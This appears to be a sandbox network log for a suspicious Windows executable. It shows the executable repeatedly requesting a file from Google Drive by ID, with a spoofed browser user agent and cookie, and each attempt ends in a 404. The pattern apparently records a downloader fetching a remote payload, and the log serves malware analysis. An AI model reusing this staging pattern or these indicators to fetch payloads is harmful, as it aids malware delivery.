                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:14 GMT
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-dmpUTmAVGiz3ysuOg9arxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:03:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 65 72 61 6e 67 75 4d 48 6e 7a 65 75 39 54 67 57 6b 35 46 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QeranguMHnzeu9TgWk5FKQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.1049983142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:25 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:26 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:25 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-DNWrFMwiDaP3iaouLls_Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.1049984142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:26 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:27 UTC1844INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgS2xczhJ-v2_mruyq0uC0XKLxAwBIKmg2iy1tupNpO1sZ0zakQZppXAHM_yVo5VcMIU
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:27 GMT
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-zweZO-bAP14EDPNFZg4AXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:03:27 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 36 79 67 4e 30 41 31 6c 6d 39 63 4d 44 41 36 6b 52 75 41 6b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="r6ygN0A1lm9cMDA6kRuAkw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.1049985142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:37 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:38 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:38 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-pJbGYd7KMFEgMCC8pQ2y3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.1049986142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:39 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:39 UTC1851INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgThTYRN7O3f64Kn6biZt94WfS5CnLvSWpPgzj3rLjRl85F-X8fgFs43wy06D-9ZXIizrEpAKtI
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:39 GMT
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: script-src 'nonce-AYcaci9eFvP0LcMVswPi7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:03:39 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 4e 30 4e 72 6a 33 6a 42 41 59 4f 6d 68 43 57 32 4c 34 65 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lN0Nrj3jBAYOmhCW2L4eTw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.1049987142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:50 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:50 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:50 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-zUMllxRrhrU5nNU0UsZ3TA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.1049988142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:51 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:51 UTC1851INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC5nIunltLmQZYqr8neEQ0YE_O6jOubGEhCqfTIC5mlahuNHO9ljCvxc_mYE7BoBJ8Vwv7HEKXE
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:51 GMT
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-5_tmSxbga8swmxmDa0vFsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:03:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 4e 63 50 77 37 46 52 42 5a 69 68 4c 68 69 6e 79 49 43 72 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bNcPw7FRBZihLhinyICrAg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.1049989142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:04:02 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:04:02 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:04:02 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: script-src 'nonce-OzRtHtfuQ4NFFq2SHmZpCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
